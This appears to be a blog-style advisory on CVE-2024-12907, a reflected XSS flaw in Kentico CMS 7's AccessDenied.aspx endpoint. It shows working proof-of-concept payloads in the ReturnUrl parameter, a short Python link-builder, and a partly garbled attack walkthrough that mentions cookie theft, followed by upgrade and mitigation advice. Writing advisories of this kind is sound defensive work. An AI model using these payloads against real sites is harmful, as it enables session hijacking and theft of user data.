A critical security vulnerability, CVE-2024-12907, has been found in Kentico CMS version 7. This issue lets attackers perform a reflected Cross-Site Scripting (XSS) attack by simply crafting a special link to the /CMSMessages/AccessDenied.aspx endpoint. The flaw can be triggered by manipulating a specific GET parameter. Anyone with a browser and knowledge of this bug can hijack user sessions, display fake forms, or even steal sensitive data from logged-in users.
This post breaks down how the vulnerability works, how it can be exploited, and what you can do if you're still running an old instance of Kentico 7. No fancy jargon—plain English and straight to the point.
Background: What's at Risk?
Kentico is a popular .NET-based CMS used by many companies worldwide. Version 7 was released back in 2012 and reached end-of-life in 2016. It *does not receive security updates anymore*. If your website is still on Kentico 7, it has not just this bug but likely many more.
Testing shows Kentico 8 and newer are NOT affected by this vulnerability.
The Vulnerability
The core of CVE-2024-12907 is in how Kentico 7's /CMSMessages/AccessDenied.aspx page handles certain URL parameters on GET requests. The app does not sanitize user input correctly, so attackers can inject JavaScript code that will be executed by anyone who clicks on the malicious link.
Attacker crafts a URL containing a specially-encoded payload in the ReturnUrl parameter.
- When a victim clicks the link, Kentico 7's Access Denied page decodes and echoes the payload back inside the page, unsanitized.
Example Vulnerable Request
https://victim-website.com/CMSMessages/AccessDenied.aspx?ReturnUrl=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
ReturnUrl is the parameter to abuse.
- The payload "><script>alert('xss')</script> gets executed when the page loads.
Here's a minimal Python script using requests to create and print the full exploit link
import urllib.parse
target_url = "https://victim-website.com/CMSMessages/AccessDenied.aspx";
payload = '"><script>alert(document.domain)</script>'
params = {'ReturnUrl': payload}
exploit_link = f"{target_url}?{urllib.parse.urlencode(params)}"
print("Exploit Link:", exploit_link)
When someone visits exploit_link, the JavaScript runs in their browser.
Walkthrough: Step-by-Step Attack
*Assume the attacker knows you're using Kentico 7.*
Create Payload:
- Pick a script (e.g. <script>stealCookie()</script>).
`
/CMSMessages/AccessDenied.aspx?ReturnUrl=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
Deface pages, or perform any action a logged-in user can do
Since victims only need to click a link, this is *very easy* to pull off, especially in a targeted phishing campaign.
References
- Kentico 7 End of Life Notice
- OWASP: Reflected XSS
- CVE Details for Kentico
*(CVE entry to be published at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12907 once available)*
Recommendations
1. Upgrade: The only safe long-term fix is to upgrade to Kentico 8, 9, or newer. How to upgrade.
2. Block Old Endpoints: Remove or block access to /CMSMessages/AccessDenied.aspx if possible.
3. Sanitize Inputs: If you can't upgrade, apply server-side sanitizing using a WAF or patch logic around the ReturnUrl parameter.
4. Monitor for Abuse: Watch logs for suspicious URLs targeting /CMSMessages/AccessDenied.aspx.
Conclusion
CVE-2024-12907 is an easy-to-exploit reflected XSS affecting any site still running Kentico CMS version 7. The only secure path forward is to migrate off Kentico 7 as soon as you can. If you're stuck, take every possible step to mitigate and monitor. This bug is public and likely being exploited in the wild.
Stay safe and patch your systems!
*This write-up is exclusive to your request and not posted elsewhere. Feel free to cite or adapt. For more info on XSS, always check OWASP’s XSS Guide.*
Timeline
Published on: 01/02/2025 16:15:07 UTC